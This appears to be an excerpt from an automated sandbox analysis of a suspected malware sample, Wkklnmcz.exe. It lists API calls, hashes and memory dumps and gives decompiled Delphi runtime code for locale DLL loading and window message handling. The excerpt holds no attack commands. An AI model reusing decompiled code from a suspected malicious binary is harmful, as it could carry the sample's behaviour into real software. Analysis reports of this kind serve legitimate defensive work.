Part of subcall function 004265A0: EnterCriticalSection.KERNEL32(00466380,00000000,00424F52,00000000,00424FB1), ref: 004265A8 Part of subcall function 004265A0: LeaveCriticalSection.KERNEL32(00466380,00466380,00000000,00424F52,00000000,00424FB1), ref: 004265B5 Part of subcall function 004265A0: EnterCriticalSection.KERNEL32(00000038,00466380,00466380,00000000,00424F52,00000000,00424FB1), ref: 004265BE Part of subcall function 004297F8: GetDC.USER32(00000000), ref: 0042984E Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00429863 Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042986D Part of subcall function 004297F8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428423,00000000,004284AF), ref: 00429891 Part of subcall function 004297F8: ReleaseDC.USER32 ref: 0042989C CreateCompatibleDC.GDI32(00000000), ref: 00428425 SelectObject.GDI32(00000000,?), ref: 0042843E SelectPalette.GDI32(00000000,?,000000FF), ref: 00428467 RealizePalette.GDI32(00000000), ref: 00428473

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease String ID: API String ID: 979337279-0 Opcode ID: 93bebc2edd455ddf18fa106c5646cc94971223008aa3a34a3a8727028a1c549a Instruction ID: e87ff1c804d76903f950264df5696ada03ea7b14f1511ea4f0a767a0c079a61f Opcode Fuzzy Hash: 93bebc2edd455ddf18fa106c5646cc94971223008aa3a34a3a8727028a1c549a Instruction Fuzzy Hash: AA310934B01664EFD704EB59D981D4DB7F5EF48314B6241AAF804AB362DA38EE40DB54

Uniqueness

Uniqueness Score: -1.00%

APIs

GetMenuState.USER32 ref: 00434033 GetSubMenu.USER32 ref: 0043403E GetMenuItemID.USER32(?,?), ref: 00434057 GetMenuStringA.USER32(?,?,?,?,?), ref: 004340AA

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ItemStateString String ID: API String ID: 306270399-0 Opcode ID: c83668f70c58b27ff1ae3854190cf90560c38d16cda432900dd57c84b320ed91 Instruction ID: 11efe109d52895c86013a67b98394270421268660deb29a3708cc45bd7cb4ea2 Opcode Fuzzy Hash: c83668f70c58b27ff1ae3854190cf90560c38d16cda432900dd57c84b320ed91 Instruction Fuzzy Hash: 0511AF31701214AFC714EE69CC809EF7BE8AF89364F10542AF909D7382CA38AD019768

Uniqueness

Uniqueness Score: -1.00%

APIs

MulDiv.KERNEL32(?), ref: 0043A4ED MulDiv.KERNEL32(?), ref: 0043A50A MulDiv.KERNEL32(?), ref: 0043A527 MulDiv.KERNEL32(?), ref: 0043A544

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 343edcee43f4d4a2bc000d28523ac80406228f184dd9ae9d624a554c2fb86fce Instruction ID: f4bc81ab66daf8a9df15c71cec539322716d65d0bf1aec78caf828b6dab18041 Opcode Fuzzy Hash: 343edcee43f4d4a2bc000d28523ac80406228f184dd9ae9d624a554c2fb86fce Instruction Fuzzy Hash: 6A0116613002182BC724BD2B5C45F5B3AADDBC9754F01507E791A9B383EAA9ED2082A8

Uniqueness

Uniqueness Score: -1.00%

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 004383E9 GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,00438454,-000000F7,?,00000000,0043800E,?,-00000010,?), ref: 004383F2 GlobalFindAtomA.KERNEL32(00000000), ref: 00438407 GetPropA.USER32 ref: 0043841E

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow String ID: API String ID: 2582817389-0 Opcode ID: c8253abe16581fcb99d44ece300b1cfe7add3b6cfb4c013908db5c544134e519 Instruction ID: edcf506c367d5b21f12e8bc81a0964d5f28cf71cb3e8e791f3115fe585ddaeb4 Opcode Fuzzy Hash: c8253abe16581fcb99d44ece300b1cfe7add3b6cfb4c013908db5c544134e519 Instruction Fuzzy Hash: D3F0276120622367D2307B726D4287F514C8D143A4B81503FFD00E2141FB6CDC52A1BF

Uniqueness

Uniqueness Score: -1.00%

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040C72F), ref: 0040C5DF GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040C72F), ref: 0040C601 Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772

Strings

Lv@ , xrefs: 0040C5B9

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLoadModuleNameQueryStringVirtual String ID: Lv@ API String ID: 902310565-2306355798 Opcode ID: a64f8a922244f8bc9df9dcd3d48b1ff787754f54841e870c1e5b0c2d58ac1ace Instruction ID: 312cfa349de001423b8fa7d1abb7a1f31512e968929e1d2ab1301cf878b75628 Opcode Fuzzy Hash: a64f8a922244f8bc9df9dcd3d48b1ff787754f54841e870c1e5b0c2d58ac1ace Instruction Fuzzy Hash: AB311870900658DFDB61DB64CD81BDAB7F9AB49304F4040FAE508A7291E7B8AE848F55

Uniqueness

Uniqueness Score: -1.00%

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040A76A), ref: 0040A702 GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0040A76A), ref: 0040A708

Strings

yyyy , xrefs: 0040A6DD

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: DateFormatLocaleThread String ID: yyyy API String ID: 3303714858-3145165042 Opcode ID: 6cf301cd4dbb5b34b884b87cd4e9d6bd7c982b661da83cb5c451281789fad814 Instruction ID: 8081e552295268892be29cc280909309cbc7073684cf05299d24970e3d403a10 Opcode Fuzzy Hash: 6cf301cd4dbb5b34b884b87cd4e9d6bd7c982b661da83cb5c451281789fad814 Instruction Fuzzy Hash: F12141756002189BDB11DBA5C982AAE73B8EF48700F5140B7F905F7381D738DE54D76A

Uniqueness

Uniqueness Score: -1.00%

Strings

Array , xrefs: 004143F4 ByRef , xrefs: 00414407 Any , xrefs: 0041436E String , xrefs: 00414356

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: Any$Array $ByRef $String API String ID: 0-2719049652 Opcode ID: 4c1bf49a875d0ce1e1ca93e9c8975ea5f3d59849904bb5522f9a09700d948057 Instruction ID: 730d68d0bf57e40a1c12294faa45c6f4f3c6e64727781c33dba2699a711d9df2 Opcode Fuzzy Hash: 4c1bf49a875d0ce1e1ca93e9c8975ea5f3d59849904bb5522f9a09700d948057 Instruction Fuzzy Hash: 732137707002148BC720EB55C841BDA73E5EBC8714F50817BBA64A37D1DB7C9E818A9E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Wkklnmcz.exe PID: 5352 Parent PID: 3352 Wkklnmcz.exeCOMMON

Executed Functions

C-Code - Quality: 87%

E00405E80(CHAR* __eax) { CHAR* _v8; void* _v12; char _v15; char _v17; char _v18; char _v22; int _v28; char _v289; long _t44; long _t61; long _t63; CHAR* _t74; struct HINSTANCE__* _t81; struct HINSTANCE__* _t88; CHAR* _t99; CHAR* _t100; intOrPtr _t104; struct HINSTANCE__* _t112; void* _t115; void* _t117; intOrPtr _t118; _t115 = _t117; _t118 = _t117 + 0xfffffee0; _v8 = __eax; GetModuleFileNameA(0, &_v289, 0x105); _v22 = 0; _t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019, &_v12); // executed if(_t44 == 0) { L3: _push(_t115); _push(0x405f85); _push( *[fs:eax]); *[fs:eax] = _t118; _v28 = 5; E00405CBC( &_v289, 0x105); if(RegQueryValueExA(_v12, &_v289, 0, 0, &_v22, &_v28) != 0 && RegQueryValueExA(_v12, E004060EC, 0, 0, &_v22, &_v28) != 0) { _v22 = 0; } _v18 = 0; _pop(_t104); *[fs:eax] = _t104; _push(0x405f8c); return RegCloseKey(_v12); } else { _t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019, &_v12); // executed if(_t61 == 0) { goto L3; } else { _t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019, &_v12); // executed if(_t63 != 0) { lstrcpynA( &_v289, _v8, 0x105); GetLocaleInfoA(GetThreadLocale(), 3, &_v17, 5); _t112 = 0; if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) { _t99 = &(( &_v289)[lstrlenA( &_v289)]); L12: if( *_t99 != 0x2e && _t99 != &_v289) { _t99 = _t99 - 1; goto L12; } _t74 = &_v289; if(_t99 != _t74) { _t100 = &(_t99[1]); if(_v22 != 0) { lstrcpynA(_t100, &_v22, 0x105 - _t100 - _t74); _t112 = LoadLibraryExA( &_v289, 0, "true"); } if(_t112 == 0 && _v17 != 0) { lstrcpynA(_t100, &_v17, 0x105 - _t100 - &_v289); _t81 = LoadLibraryExA( &_v289, 0, "true"); // executed _t112 = _t81; if(_t112 == 0) { _v15 = 0; lstrcpynA(_t100, &_v17, 0x105 - _t100 - &_v289); _t88 = LoadLibraryExA( &_v289, 0, "true"); // executed _t112 = _t88; } } } } return _t112; } else { goto L3; } } } } 0x00405e81 0x00405e83 0x00405e8b 0x00405e9c 0x00405ea1 0x00405eba 0x00405ec1 0x00405f03 0x00405f05 0x00405f06 0x00405f0b 0x00405f0e 0x00405f11 0x00405f23 0x00405f46 0x00405f66 0x00405f66 0x00405f6a 0x00405f70 0x00405f73 0x00405f76 0x00405f84 0x00405ec3 0x00405ed8 0x00405edf 0x00000000 0x00405ee1 0x00405ef6 0x00405efd 0x00405f9c 0x00405faf 0x00405fb4 0x00405fbd 0x00405fe7 0x00405fec 0x00405fef 0x00405feb 0x00000000 0x00405feb 0x00405ffb 0x00406003 0x00406009 0x0040600e 0x00406021 0x00406036 0x00406036 0x0040603a 0x00406059 0x00406069 0x0040606e 0x00406072 0x00406074 0x0040608f 0x0040609f 0x004060a4 0x004060a4 0x00406072 0x0040603a 0x00406003 0x004060ad 0x00000000 0x00000000 0x00000000 0x00405efd 0x00405edf

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,00400000,00461790), ref: 00405E9C RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405EBA RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405ED8 RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405EF6 RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405F3F RegQueryValueExA.ADVAPI32(?,004060EC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001), ref: 00405F5D RegCloseKey.ADVAPI32(?,00405F8C,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405F7F lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405F9C GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405FA9 GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405FAF lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405FDA lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406021 LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406031 lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406059 LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406069 lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0040608F LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?), ref: 0040609F

Strings

Software\Borland\Locales , xrefs: 00405EB0, 00405ECE Software\Borland\Delphi\Locales , xrefs: 00405EEC

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales API String ID: 1759228003-2375825460 Opcode ID: e85b8b5f18f98d11f77dd4a75a6bfc4e909d9d51afbd20e7fd9dae12ec9badaa Instruction ID: 78b8716c1d6b3f78e059c23326c5bad80ecdfc9d22bb9ed19f786db41dfff9de Opcode Fuzzy Hash: e85b8b5f18f98d11f77dd4a75a6bfc4e909d9d51afbd20e7fd9dae12ec9badaa Instruction Fuzzy Hash: 6A516F75A4021D7AFB21D6A48C46FEF7BEC9B04744F4401B7BA04F61C2E67C9E448B69

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%

E0045603C(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) { struct HWND__* _v8; struct HWND__* _v12; void* __ebx; void* __esi; void* __ebp; signed int _t161; struct HWND__* _t162; struct HWND__* _t163; void* _t166; struct HWND__* _t176; struct HWND__* _t185; struct HWND__* _t188; struct HWND__* _t189; struct HWND__* _t191; struct HWND__* _t197; struct HWND__* _t199; struct HWND__* _t202; struct HWND__* _t205; struct HWND__* _t206; struct HWND__* _t216; struct HWND__* _t217; struct HWND__* _t222; struct HWND__* _t224; struct HWND__* _t227; struct HWND__* _t231; struct HWND__* _t239; struct HWND__* _t248; struct HWND__* _t252; struct HWND__* _t254; struct HWND__* _t255; struct HWND__* _t267; intOrPtr _t270; struct HWND__* _t273; struct HWND__* _t274; struct HWND__* _t276; intOrPtr* _t277; struct HWND__* _t285; struct HWND__* _t287; void* _t307; signed int _t309; struct HWND__* _t315; struct HWND__* _t316; struct HWND__* _t317; void* _t318; intOrPtr _t342; struct HWND__* _t346; intOrPtr _t368; void* _t372; struct HWND__* _t377; void* _t378; void* _t379; intOrPtr _t380; _t318 = __ecx; _push(_t372); _v12 = __edx; _v8 = __eax; _push(_t379); _push(0x456706); _push( *[fs:edx]); *[fs:edx] = _t380; *(_v12 + 0xc) = 0; _t307 = *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xb0)) + 8)) - 1; if(_t307 < 0) { L5: L00455EF0(_v8, _t318, _v12); _t309 = *_v12; _t161 = _t309; __eflags = _t161 - 0x53; if(__eflags > 0) { __eflags = _t161 - 0xb017; if(__eflags > 0) { __eflags = _t161 - 0xb020; if(__eflags > 0) { _t162 = _t161 - 0xb031; __eflags = _t162; if(_t162 == 0) { _t163 = _v12; __eflags = *((intOrPtr*)(_t163 + 4)) - 1; if( *((intOrPtr*)(_t163 + 4)) != 1) { *(_v8 + 0xb8) = *(_v12 + 8); } else { *(_v12 + 0xc) = *(_v8 + 0xb8); } L105: _t166 = 0; _pop(_t342); *[fs:eax] = _t342; goto L106; } __eflags = _t162 + 0xfffffff2 - 2; if(_t162 + 0xfffffff2 - 2 < 0) { *(_v12 + 0xc) = E00458554(_v8, *(_v12 + 8), _t309) & 0x0000007f; } else { L104: E00455FB4(_t379); // executed } goto L105; } if(__eflags == 0) { _t176 = _v12; __eflags = *(_t176 + 4); if( *(_t176 + 4) != 0) { E00456E20(_v8, _t318, *( *(_v12 + 8)), *((intOrPtr*)( *(_v12 + 8) + 4))); } else { E00456DC4(_v8, *( *(_v12 + 8)), *((intOrPtr*)( *(_v12 + 8) + 4))); } goto L105; } _t185 = _t161 - 0xb01a; __eflags = _t185; if(_t185 == 0) { _t188 = IsIconic( *(_v8 + 0x30)); __eflags = _t188; if(_t188 == 0) { _t189 = GetFocus(); _t346 = _v8; __eflags = _t189 - *((intOrPtr*)(_t346 + 0x30)); if(_t189 == *((intOrPtr*)(_t346 + 0x30))) { _t191 = E0044CB68(0); __eflags = _t191; if(_t191 != 0) { SetFocus(_t191); } } } goto L105; } __eflags = _t185 == 5; if(_t185 == 5) { L93: E00457374(_v8, *(_v12 + 8), *(_v12 + 4) & 0x0000ffff); goto L105; } else { goto L104; } } if(__eflags == 0) { _t197 = *(_v8 + 0x44); __eflags = _t197; if(_t197 != 0) { _t311 = _t197; _t199 = E004423F8(_t197); __eflags = _t199; if(_t199 != 0) { _t202 = IsWindowEnabled(E004423F8(_t311)); __eflags = _t202; if(_t202 != 0) { _t205 = IsWindowVisible(E004423F8(_t311)); __eflags = _t205; if(_t205 != 0) { *0x4626c0 = 0; _t206 = GetFocus(); SetFocus(E004423F8(_t311)); E0043BC9C(_t311, *(_v12 + 4), 0x112, *(_v12 + 8)); SetFocus(_t206); *0x4626c0 = 1; *(_v12 + 0xc) = 1; } } } } goto L105; } __eflags = _t161 - 0xb000; if(__eflags > 0) { _t216 = _t161 - 0xb001; __eflags = _t216; if(_t216 == 0) { _t217 = _v8; __eflags = *((short*)(_t217 + 0x132)); if( *((short*)(_t217 + 0x132)) != 0) { *((intOrPtr*)(_v8 + 0x130))(); } goto L105; } __eflags = _t216 == 0x15; if(_t216 == 0x15) { _t222 = E00456B84(_v8, _t318, _v12); __eflags = _t222; if(_t222 != 0) { *(_v12 + 0xc) = 1; } goto L105; } else { goto L104; } } if(__eflags == 0) { _t224 = _v8; __eflags = *((short*)(_t224 + 0x13a)); if( *((short*)(_t224 + 0x13a)) != 0) { *((intOrPtr*)(_v8 + 0x138))(); } goto L105; } _t227 = _t161 - 0x112; __eflags = _t227; if(_t227 == 0) { _t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020; __eflags = _t231; if(_t231 == 0) { E0045676C(_v8); } else { __eflags = _t231 == 0x100; if(_t231 == 0x100) { E00456830(_v8); } else { E00455FB4(_t379); } } goto L105; } _t239 = _t227 + 0xffffffe0 - 7; __eflags = _t239; if(_t239 < 0) { *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t309 + 0xbc00, *(_v12 + 4), *(_v12 + 8)); goto L105; } __eflags = _t239 == 0x1e1; if(_t239 == 0x1e1) { E0042DCD8(E0042DB74()); goto L105; } else { goto L104; } } if(__eflags == 0) { goto L93; } __eflags = _t161 - 0x14; if(__eflags > 0) { __eflags = _t161 - 0x1d; if(__eflags > 0) { _t248 = _t161 - 0x37; __eflags = _t248; if(_t248 == 0) { *(_v12 + 0xc) = E00456750(_v8); goto L105; } __eflags = _t248 == 0x13; if(_t248 == 0x13) { _t252 = _v12; __eflags = *((intOrPtr*)( *((intOrPtr*)(_t252 + 8)))) - 0xde534454; if( *((intOrPtr*)( *((intOrPtr*)(_t252 + 8)))) == 0xde534454) { _t254 = _v8; __eflags = *((char*)(_t254 + 0xa6)); if( *((char*)(_t254 + 0xa6)) != 0) { _t255 = _v8; __eflags = *(_t255 + 0xa8); if( *(_t255 + 0xa8) != 0) { *(_v12 + 0xc) = 0; } else { _t315 = E0040DDC0("vcltest3.dll", _t309, 0x8000); *(_v8 + 0xa8) = _t315; __eflags = _t315; if(_t315 == 0) { *(_v12 + 0xc) = GetLastError(); *(_v8 + 0xa8) = 0; } else { *(_v12 + 0xc) = 0; _t377 = GetProcAddress( *(_v8 + 0xa8), "RegisterAutomation"); _t316 = _t377; __eflags = _t377; if(_t377 != 0) { _t267 = *(_v12 + 8); _t316->i( *((intOrPtr*)(_t267 + 4)), *((intOrPtr*)(_t267 + 8))); } } } } } goto L105; } else { goto L104; } } if(__eflags == 0) { _t270 = *0x466584; // 0x26e66a0 E00455244(_t270); E00455FB4(_t379); goto L105; } _t273 = _t161 - 0x16; __eflags = _t273; if(_t273 == 0) { _t274 = _v12; __eflags = *(_t274 + 4); if( *(_t274 + 4) != 0) { E0040D818(); E00404648(); } goto L105; } _t276 = _t273 - 4; __eflags = _t276; if(_t276 == 0) { _t277 = *0x462ed4; // 0x4664ec E00447478( *_t277, _t318, *(_v12 + 4)); L00455F48(_v8, _t309, _t318, _v12, _t372); E00455FB4(_t379); goto L105; } __eflags = _t276 == 2; if(_t276 == 2) { E00455FB4(_t379); _t285 = _v12; __eflags = *((intOrPtr*)(_t285 + 4)) - 1; asm("sbb eax, eax"); *((char*)(_v8 + 0xa5)) = _t285 + 1; _t287 = _v12; __eflags = *(_t287 + 4); if( *(_t287 + 4) == 0) { E00455CBC(); PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0); } else { E00455D1C(_v8); PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0); } goto L105; } else { goto L104; } } if(__eflags == 0) { *_v12 = 0x27; E00455FB4(_t379); goto L105; } __eflags = _t161 - 0x11; if(_t161 > 0x11) { goto L104; } switch( *((intOrPtr*)(_t161 * 4 + &M004560E0))) { case 0: 0 = E0042048C(0, __ebx, __edi, __esi); goto L105; case 1: goto L104; case 2: _push(0); _push(0); _push(0xb01a); _v8 = *(_v8 + 0x30); _push( *(_v8 + 0x30)); L0040717C(); __eax = E00455FB4(__ebp); goto L105; case 3: __eax = _v12; __eflags = *(__eax + 4); if( *(__eax + 4) == 0) { __eax = E00455FB4(__ebp); __eax = _v8; __eflags = *(__eax + 0xb4); if( *(__eax + 0xb4) == 0) { __eflags = *0x4626d4; if( *0x4626d4 == 0) { __eax = _v8; __eax = *(_v8 + 0x30); __eax = E0044CA08( *(_v8 + 0x30), __ebx, __edi, __esi); __edx = _v8; *(_v8 + 0xb4) = __eax; } } _v8 = L00455CC4(); } else { __eflags = *0x4626d4; if( *0x4626d4 == 0) { _v8 = E00455D1C(_v8); __eax = _v8; __eax = *(_v8 + 0xb4); __eflags = __eax; if(__eax != 0) { __eax = _v8; __edx = 0; __eflags = 0; *(_v8 + 0xb4) = 0; } } __eax = E00455FB4(__ebp); } goto L105; case 4: __eax = _v8; __eax = *(_v8 + 0x30); _push(__eax); L004070DC(); __eflags = __eax; if(__eax == 0) { __eax = E00455FB4(__ebp); } else { __eax = L00455FF0(__ebp); } goto L105; case 5: __eax = _v8; __eax = *(_v8 + 0x44); __eflags = __eax; if(__eax != 0) { __eax = E004532AC(__eax, __ecx); } goto L105; case 6: __eax = _v12; *(_v12 + 0xc) = 1; goto L105; } } else { _t317 = _t307 + 1; _t378 = 0; L2: L2: if( *((intOrPtr*)(E0041A80C( *((intOrPtr*)(_v8 + 0xb0)), _t378)))() == 0) { goto L4; } else { _t166 = 0; _pop(_t368); *[fs:eax] = _t368; } L106: return _t166; L4: _t378 = _t378 + 1; _t317 = _t317 - 1; __eflags = _t317; if(_t317 != 0) { goto L2; } goto L5; } } 0x0045603c 0x00456043 0x00456045 0x00456048 0x0045604d 0x0045604e 0x00456053 0x00456056 0x0045605e 0x0045606d 0x00456070 0x004560a4 0x004560aa 0x004560b2 0x004560b4 0x004560b6 0x004560b9 0x0045616a 0x0045616f 0x004561c0 0x004561c5 0x004561e6 0x004561e6 0x004561eb 0x0045667c 0x0045667f 0x00456683 0x0045669f 0x00456685 0x00456691 0x00456691 0x004566fc 0x004566fc 0x004566fe 0x00456701 0x00000000 0x00456701 0x004561f4 0x004561f7 0x004564d7 0x004561fd 0x004566f5 0x004566f6 0x004566fb 0x00000000 0x004561f7 0x004561c7 0x00456643 0x00456646 0x0045664a 0x00456672 0x0045664c 0x0045665a 0x0045665a 0x00000000 0x0045664a 0x004561cd 0x004561cd 0x004561d2 0x004565f1 0x004565f6 0x004565f8 0x004565fe 0x00456603 0x00456606 0x00456609 0x00456611 0x00456616 0x00456618 0x0045661f 0x0045661f 0x00456618 0x00456609 0x00000000 0x004565f8 0x004561d8 0x004561db 0x00456629 0x00456639 0x00000000 0x004561e1 0x00000000 0x004561e1 0x004561db 0x00456171 0x00456504 0x00456507 0x00456509 0x0045650f 0x00456513 0x00456518 0x0045651a 0x00456528 0x0045652d 0x0045652f 0x0045653d 0x00456542 0x00456544 0x0045654a 0x00456551 0x00456560 0x00456579 0x0045657f 0x00456584 0x0045658e 0x0045658e 0x00456544 0x0045652f 0x0045651a 0x00000000 0x00456509 0x00456177 0x0045617c 0x004561a7 0x004561a7 0x004561ac 0x004565c2 0x004565c5 0x004565cd 0x004565df 0x004565df 0x00000000 0x004565cd 0x004561b2 0x004561b5 0x004564e5 0x004564ea 0x004564ec 0x004564f5 0x004564f5 0x00000000 0x004561bb 0x00000000 0x004561bb 0x004561b5 0x0045617e 0x0045659a 0x0045659d 0x004565a5 0x004565b7 0x004565b7 0x00000000 0x004565a5 0x00456184 0x00456184 0x00456189 0x0045620d 0x0045620d 0x00456212 0x00456220 0x00456214 0x00456214 0x00456219 0x0045622d 0x0045621b 0x00456238 0x0045623d 0x00456219 0x00000000 0x00456212 0x0045618e 0x0045618e 0x00456191 0x004563d7 0x00000000 0x004563d7 0x00456197 0x0045619c 0x004566e5 0x00000000 0x004561a2 0x00000000 0x004561a2 0x0045619c 0x004560bf 0x00000000 0x00000000 0x004560c5 0x004560c8 0x00456128 0x0045612b 0x00456153 0x00456153 0x00456156 0x004562a3 0x00000000 0x004562a3 0x0045615c 0x0045615f 0x0045640a 0x00456410 0x00456416 0x0045641c 0x0045641f 0x00456426 0x0045642c 0x0045642f 0x00456436 0x004564b6 0x00456438 0x00456447 0x0045644c 0x00456452 0x00456454 0x0045649e 0x004564a6 0x00456456 0x0045645b 0x00456472 0x00456474 0x00456476 0x00456478 0x00456481 0x0045648f 0x0045648f 0x00456478 0x00456454 0x00456436 0x00456426 0x00000000 0x00456165 0x00000000 0x00456165 0x0045615f 0x0045612d 0x004566cd 0x004566d2 0x004566d8 0x00000000 0x004566dd 0x00456133 0x00456133 0x00456136 0x004563df 0x004563e2 0x004563e6 0x004563ec 0x004563f1 0x004563f1 0x00000000 0x004563e6 0x0045613c 0x0045613c 0x0045613f 0x004566ad 0x004566b4 0x004566bf 